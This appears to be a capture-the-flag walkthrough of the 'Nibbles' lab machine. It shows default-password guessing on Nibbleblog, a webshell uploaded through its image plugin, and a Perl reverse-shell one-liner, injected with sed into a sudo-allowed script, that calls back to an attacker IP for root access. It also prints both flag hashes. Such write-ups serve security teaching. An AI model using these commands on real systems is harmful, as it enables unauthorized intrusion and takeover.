Nibbles logo

This is an easy linux box

Tools used


  • browser
  • cat
  • ffuf
  • ls
  • nc
  • nmap
  • searchsploit
  • sed
  • sudo
  • unzip

Reconnaissance


Nmap

nmap -sC -sV -oA nibbles 10.10.10.75 -v

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Here’s what nmap teaches us :

  • port 22 (SSH) - OpenSSH 7.2p2
  • port 80 (HTTP) - Apache 2.4.18

Not a lot of open ports, let’s first go to the web port.

There’s not a lot of thing here, so I went up the source code and here’s what was in it :

<!-- /nibbleblog/ directory. Nothing interesting here! -->

Went on it :

Nibbleblog

So this is a blog and we can see at the bottom right that this is “Powered by Nibbleblog”. From here I used ffuf to do some files/directories brute force.

ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.75/nibbleblog/FUZZ -e .php,.html,.txt -t 250

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.1.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.75/nibbleblog/FUZZ
 :: Wordlist         : FUZZ: /home/liodeus/directory-list-lowercase-2.3-medium.txt
 :: Extensions       : .php .html .txt 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 250
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

index.php               [Status: 200, Size: 2985, Words: 116, Lines: 61]
themes                  [Status: 301, Size: 322, Words: 20, Lines: 10]
feed.php                [Status: 200, Size: 302, Words: 8, Lines: 8]
admin                   [Status: 301, Size: 321, Words: 20, Lines: 10]
admin.php               [Status: 200, Size: 1401, Words: 79, Lines: 27]
plugins                 [Status: 301, Size: 323, Words: 20, Lines: 10]
install.php             [Status: 200, Size: 78, Words: 11, Lines: 1]
update.php              [Status: 200, Size: 1621, Words: 103, Lines: 88]
languages               [Status: 301, Size: 325, Words: 20, Lines: 10]
sitemap.php             [Status: 200, Size: 401, Words: 33, Lines: 11]
content                 [Status: 301, Size: 323, Words: 20, Lines: 10]

Looking throught those files and directories, I was able to found the version of blog used, a login page and a user :

Nibbleblog version

Nibbleblog login page

Nibbleblog user page

Knowing the version installed let’s see if there is known exploits :

Searchsploit Nibbleblog 4.0.3

Nice, there is one ! It’s a Metasploit module, let’s read the code and do it manually, first download the exploit :

searchsploit -m php/remote/38489.rb

Reading throught the code, I first need an account to exploit this flaw :

Nibbleblog contains a flaw that allows a authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3.

Let’s go back to our login page, I know the username, just missing the password ! Let’s try default passwords :

  • admin:admin - Not working
  • admin:root - Not working
  • admin:password - Not working
  • admin:administrator - Not working
  • admin:nibbles - Working

I now have the admin account ! I did not fully understand the metasploit module, so I search on Google how to exploit the Nibbleblog flaw and I found this wiki with a great explanation : https://wikihak.com/how-to-upload-a-shell-in-nibbleblog-4-0-3/.

Now let’s exploit !

Exploit


First go to :

http://10.10.10.75/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image

Image plugin

Then browse and upload a webshell or reverse shell. I used a webshell that I very like which is p0wny-shell (https://github.com/flozz/p0wny-shell). Ignore the warnings upon upload :

Warnings ignore

And now go to :

http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

Powny shell

I have a webshell as the user ! Now it’s time to root ! First things that I do, is to check if I can run commands as someone else :

sudo -l
Matching Defaults entries for nibbler on Nibbles:
	env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
	(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

I can run a bash script with root privileges ! So if I can modify monitor.sh it’s a win !

p0wny@shell:/home/nibbler# ls
personal.zip
user.txt

Unzip the zip file, like so :

p0wny@shell:/home/nibbler# unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh

Now let’s see the rights of this file :

p0wny@shell:…/personal/stuff# ls -al
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10  2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh

Nice I can modify it ! It’s a win, I just have to add a reverse shell in the file and launch it as root.

sed  -i '1i perl -e '\''use Socket;$i="10.10.14.10";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'\''' monitor.sh

This is adding my perl reverse shell (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) at the begining of the file. Launch a nc listener :

nc -lvp 1234

And launch the script with root privileges :

sudo -u root /home/nibbler/personal/stuff/monitor.sh

Go check the nc listner :

nc -lvp 1234
listening on [any] 1234 ...
10.10.10.75: inverse host lookup failed: Unknown host
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.75] 52660
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

Voila ! I’m root, now go read the flags.

Flags


User.txt

cat user.txt
b02ff32bb332deba49eeaed21152c8d8

Root.txt

cat root.txt
b6d745c0dfb6457c55591efc898ef88c